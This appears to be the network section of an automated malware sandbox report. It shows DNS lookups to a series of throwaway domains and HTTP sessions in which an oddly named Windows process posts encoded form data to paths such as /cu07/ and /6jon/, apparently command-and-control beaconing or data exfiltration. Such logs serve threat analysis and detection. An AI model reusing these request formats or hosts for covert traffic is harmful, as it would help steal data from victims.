                                                                                          Jan 8, 2025 15:02:50.810811996 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.810822010 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.813719034 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.813719034 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.813735008 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.813735008 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.817626953 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.822428942 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:55.825364113 CET5001480192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:02:55.830274105 CET8050014154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:02:55.830352068 CET5001480192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:02:55.854608059 CET5001480192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:02:55.859400988 CET8050014154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:02:56.720065117 CET8050014154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:02:56.720211029 CET8050014154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:02:56.720350981 CET5001480192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:02:57.367644072 CET5001480192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:02:58.387975931 CET5001580192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:02:58.509639978 CET8050015154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:02:58.509726048 CET5001580192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:02:58.524048090 CET5001580192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:02:58.528956890 CET8050015154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:02:59.365149021 CET8050015154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:02:59.365294933 CET8050015154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:02:59.365461111 CET5001580192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:00.038749933 CET5001580192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:01.057939053 CET5001680192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:01.062829971 CET8050016154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:03:01.062947035 CET5001680192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:01.077356100 CET5001680192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:01.082159042 CET8050016154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:03:01.082336903 CET8050016154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:03:02.605134010 CET8050016154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:03:02.605155945 CET8050016154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:03:02.605197906 CET8050016154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:03:02.605310917 CET5001680192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:02.605355024 CET8050016154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:03:02.605484009 CET5001680192.168.2.6154.213.39.66
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 8, 2025 14:59:33.252701998 CET | 192.168.2.6 | 1.1.1.1 | 0xd4cc | Standard query (0) | www.aihuzhibo.net | A (IP address) | IN (0x0001) | false
Jan 8, 2025 14:59:50.338499069 CET | 192.168.2.6 | 1.1.1.1 | 0xb109 | Standard query (0) | www.f5jh81t3k1w8.sbs | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:00:05.167141914 CET | 192.168.2.6 | 1.1.1.1 | 0x2bda | Standard query (0) | www.cruycq.info | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:00:19.464049101 CET | 192.168.2.6 | 1.1.1.1 | 0x6345 | Standard query (0) | www.neoparty.sbs | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:00:33.213702917 CET | 192.168.2.6 | 1.1.1.1 | 0x3d8b | Standard query (0) | www.1126xx.shop | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:00:41.301337957 CET | 192.168.2.6 | 1.1.1.1 | 0x33e3 | Standard query (0) | www.deadshoy.tech | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:00:54.497474909 CET | 192.168.2.6 | 1.1.1.1 | 0x13b4 | Standard query (0) | www.reynamart.store | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:01:02.626422882 CET | 192.168.2.6 | 1.1.1.1 | 0xe37b | Standard query (0) | www.mosorehlable.online | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:01:16.591289043 CET | 192.168.2.6 | 1.1.1.1 | 0x2f46 | Standard query (0) | www.solidf.xyz | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:01:29.886708975 CET | 192.168.2.6 | 1.1.1.1 | 0xa3d9 | Standard query (0) | www.laduta.xyz | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:01:43.079997063 CET | 192.168.2.6 | 1.1.1.1 | 0x2b45 | Standard query (0) | www.londonatnight.coffee | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:01:57.277687073 CET | 192.168.2.6 | 1.1.1.1 | 0x54d6 | Standard query (0) | www.itcomp.store | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:01:58.273088932 CET | 192.168.2.6 | 1.1.1.1 | 0x54d6 | Standard query (0) | www.itcomp.store | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:02:13.121488094 CET | 192.168.2.6 | 1.1.1.1 | 0x1299 | Standard query (0) | www.envisionmedia.shop | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:02:21.219557047 CET | 192.168.2.6 | 1.1.1.1 | 0x1b65 | Standard query (0) | www.vavada-official.buzz | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:02:29.308382988 CET | 192.168.2.6 | 1.1.1.1 | 0xaf4f | Standard query (0) | www.sob.rip | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:02:37.448587894 CET | 192.168.2.6 | 1.1.1.1 | 0x2ae5 | Standard query (0) | www.brunokito.cloud | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 8, 2025 14:59:33.637382984 CET | 1.1.1.1 | 192.168.2.6 | 0xd4cc | No error (0) | www.aihuzhibo.net | | 192.186.58.31 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 14:59:51.282987118 CET | 1.1.1.1 | 192.168.2.6 | 0xb109 | No error (0) | www.f5jh81t3k1w8.sbs | | 154.213.39.66 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:00:05.181603909 CET | 1.1.1.1 | 192.168.2.6 | 0x2bda | No error (0) | www.cruycq.info | | 47.83.1.90 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:00:19.475791931 CET | 1.1.1.1 | 192.168.2.6 | 0x6345 | No error (0) | www.neoparty.sbs | | 104.21.53.168 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:00:19.475791931 CET | 1.1.1.1 | 192.168.2.6 | 0x6345 | No error (0) | www.neoparty.sbs | | 172.67.215.171 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:00:33.225605011 CET | 1.1.1.1 | 192.168.2.6 | 0x3d8b | Name error (3) | www.1126xx.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:00:41.369594097 CET | 1.1.1.1 | 192.168.2.6 | 0x33e3 | No error (0) | www.deadshoy.tech | | 199.59.243.228 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:00:54.506550074 CET | 1.1.1.1 | 192.168.2.6 | 0x13b4 | Name error (3) | www.reynamart.store | none | none | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:01:02.729482889 CET | 1.1.1.1 | 192.168.2.6 | 0xe37b | No error (0) | www.mosorehlable.online | | 194.58.112.174 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:01:16.604664087 CET | 1.1.1.1 | 192.168.2.6 | 0x2f46 | No error (0) | www.solidf.xyz | | 199.192.21.169 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:01:29.902587891 CET | 1.1.1.1 | 192.168.2.6 | 0xa3d9 | No error (0) | www.laduta.xyz | | 192.64.119.109 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:01:43.097182989 CET | 1.1.1.1 | 192.168.2.6 | 0x2b45 | No error (0) | www.londonatnight.coffee | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:01:43.097182989 CET | 1.1.1.1 | 192.168.2.6 | 0x2b45 | No error (0) | www.londonatnight.coffee | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:01:59.197990894 CET | 1.1.1.1 | 192.168.2.6 | 0x54d6 | No error (0) | www.itcomp.store | itcomp.store | | CNAME (Canonical name) | IN (0x0001) | false
Jan 8, 2025 15:01:59.197990894 CET | 1.1.1.1 | 192.168.2.6 | 0x54d6 | No error (0) | itcomp.store | | 103.247.11.204 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:01:59.198008060 CET | 1.1.1.1 | 192.168.2.6 | 0x54d6 | No error (0) | www.itcomp.store | itcomp.store | | CNAME (Canonical name) | IN (0x0001) | false
Jan 8, 2025 15:01:59.198008060 CET | 1.1.1.1 | 192.168.2.6 | 0x54d6 | No error (0) | itcomp.store | | 103.247.11.204 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:02:13.130341053 CET | 1.1.1.1 | 192.168.2.6 | 0x1299 | Name error (3) | www.envisionmedia.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:02:21.228049040 CET | 1.1.1.1 | 192.168.2.6 | 0x1b65 | Name error (3) | www.vavada-official.buzz | none | none | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:02:29.324350119 CET | 1.1.1.1 | 192.168.2.6 | 0xaf4f | Name error (3) | www.sob.rip | none | none | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:02:37.458915949 CET | 1.1.1.1 | 192.168.2.6 | 0x2ae5 | Name error (3) | www.brunokito.cloud | none | none | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49843 | 192.186.58.31 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 14:59:33.664927959 CET | 514 | OUT | GET /rdtl/?T4OdNH=ZOY+qajotO8Y54RWsMlJRfAzJROg7M0EIy2xGwNHpdBqbD/KLW5LjtA9XnFn7YFdiYP1wWcAq05pnCTjdSlGxG6S3f6vZO/FXf/kuh5YN7SlcCVE00CSvDbDDRrbh0G7SoDKmOo=&r4=tP5HWLt8wXstw4H HTTP/1.1
                                                                                          Host: www.aihuzhibo.net
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
Jan 8, 2025 14:59:34.664870977 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 13:59:34 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49955 | 154.213.39.66 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 14:59:51.304882050 CET | 778 | OUT | POST /cu07/ HTTP/1.1
                                                                                          Host: www.f5jh81t3k1w8.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.f5jh81t3k1w8.sbs
                                                                                          Referer: http://www.f5jh81t3k1w8.sbs/cu07/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 211
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH=w3n7Px+0LxK5Eu/hS037xNCx/a5iNDTWBsVB3T9LR0Y9qbvBcf9Sgyv1tXNZLl6E3LUIQ51a0um64lFopiZYP8l8rpoL+TRKqeQzm3fIR6vnVDwF4fc1CG/KTBCOzcE5uNEEuDMvVHQcVZfzx5RhQDdOo2N1fsXV30UVYnE0u5gXuR8XSzJSdziIQHNVfG/nxUx46QtO10+N
Jan 8, 2025 14:59:52.189286947 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 13:59:52 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          2 | 192.168.2.6 | 49971 | 154.213.39.66 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 14:59:53.860703945 CET | 802 | OUT | POST /cu07/ HTTP/1.1
                                                                                          Host: www.f5jh81t3k1w8.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.f5jh81t3k1w8.sbs
                                                                                          Referer: http://www.f5jh81t3k1w8.sbs/cu07/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 235
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH=w3n7Px+0LxK5EOvhRXf73tCwhK5iHjTSBsRB3WcTRm89q+DBdclSnyv1i3NQFF6P3LZiQ55a0uy64l1opxxZOsl+mJoN6TRKqeQzmz2nR63nUzgF76w0Mm/VExCO58E9uNFpuCRAVBUcVYPzxrpiFTdIiWMgQdOb30dnS0E2wqY0vnhNOAJxPjCKQFVnfm/NzUJ4oHhp6AbusmJclf8Dj7IaC07QBMFrBQ==
                                                                                          Jan 8, 2025 14:59:54.737745047 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 13:59:54 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          3 | 192.168.2.6 | 49979 | 154.213.39.66 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 14:59:56.702795982 CET | 1815 | OUT | POST /cu07/ HTTP/1.1
                                                                                          Host: www.f5jh81t3k1w8.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.f5jh81t3k1w8.sbs
                                                                                          Referer: http://www.f5jh81t3k1w8.sbs/cu07/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1247
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH= [TRUNCATED]
                                                                                          Jan 8, 2025 14:59:57.587821007 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 13:59:57 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          4 | 192.168.2.6 | 49980 | 154.213.39.66 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 14:59:59.242489100 CET | 517 | OUT | GET /cu07/?T4OdNH=91PbMFSFbRabMZnMSUj76NvR/Zd0MhT8JKpW4EQcOk8mlMTVcdIaqQPrq3FRSR+owpFtRocVxvjr424E5RpVHJgZhbFN+EtYqaINmBGTcL2VcGMzu+tmB3TsTAvOn48cudhpsmM=&r4=tP5HWLt8wXstw4H HTTP/1.1
                                                                                          Host: www.f5jh81t3k1w8.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:00:00.156548023 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 13:59:59 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          5 | 192.168.2.6 | 49981 | 47.83.1.90 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:00:05.203670979 CET | 763 | OUT | POST /6jon/ HTTP/1.1
                                                                                          Host: www.cruycq.info
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.cruycq.info
                                                                                          Referer: http://www.cruycq.info/6jon/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 211
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH=oadYx81Ls7zSvWIdj2nfvgj1XgzENtvgYPE7Aw437WJQpIKNqDGS3iyFlgOvttWjuPQsKGAkZp+m39Wx6pleQdvycPsQAHZq9BcKXalkBs+nl+27JP5NZPoUoo9Hl3zxJY1+A2+nwTkF83KiTfgqP/e6gCdVXQuhAnhXWOoNcULDwiVUdja5pbGqLfHgY0a9WvLWCLOOww5P
                                                                                          Jan 8, 2025 15:00:06.834764957 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Wed, 08 Jan 2025 14:00:06 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          6 | 192.168.2.6 | 49982 | 47.83.1.90 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:00:07.749247074 CET | 787 | OUT | POST /6jon/ HTTP/1.1
                                                                                          Host: www.cruycq.info
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.cruycq.info
                                                                                          Referer: http://www.cruycq.info/6jon/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 235
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH=oadYx81Ls7zSu1AdmXnfqAj0JQzEHNupYPI7Ax9o7FtQosGNtB+S0iyFqAOqjNW4uPc7KD4kZqCm38Gx66NZQNvKd/sSEHZq9BcKXaxdBs2niPG7IrVMUvoTro9H0Hz1JY1YAymJwRsF83aiSL8tBPej+yc8cVXKGEkgSYgsN2Gk80IOBQaa7LmoLdfSYUaXUvzWQcCp/EcswlImRcxzczYVsAh3D9wxZw==
                                                                                          Jan 8, 2025 15:00:10.233587980 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Wed, 08 Jan 2025 14:00:09 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0
                                                                                          Jan 8, 2025 15:00:10.233931065 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Wed, 08 Jan 2025 14:00:09 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0
                                                                                          Jan 8, 2025 15:00:10.234111071 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Wed, 08 Jan 2025 14:00:09 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          7 | 192.168.2.6 | 49983 | 47.83.1.90 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:00:10.295020103 CET | 1800 | OUT | POST /6jon/ HTTP/1.1
                                                                                          Host: www.cruycq.info
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.cruycq.info
                                                                                          Referer: http://www.cruycq.info/6jon/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1247
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH= [TRUNCATED]


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          8 | 192.168.2.6 | 49984 | 47.83.1.90 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:00:12.887418985 CET | 512 | OUT | GET /6jon/?r4=tP5HWLt8wXstw4H&T4OdNH=lY14yI5fwZOcgUQUpnTLlx+QJBfbC4DwEOc7MQQgkkxJhrqVuxiq0TqPiA2X0dq4ve8sLU4ITp6q3cu8oZorZNmhdsAOEHd31HcaUahVOt7Sj+u/MvofX8Uu67Ih0HTVKoUtY2c= HTTP/1.1
                                                                                          Host: www.cruycq.info
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:00:14.452493906 CET | 139 | IN | HTTP/1.1 567 unknown
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Wed, 08 Jan 2025 14:00:14 GMT
                                                                                          Content-Length: 17
                                                                                          Connection: close
                                                                                          Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                                          Data Ascii: Request too large


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          9 | 192.168.2.6 | 49985 | 104.21.53.168 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:00:19.497598886 CET | 766 | OUT | POST /qc6u/ HTTP/1.1
                                                                                          Host: www.neoparty.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.neoparty.sbs
                                                                                          Referer: http://www.neoparty.sbs/qc6u/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 211
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
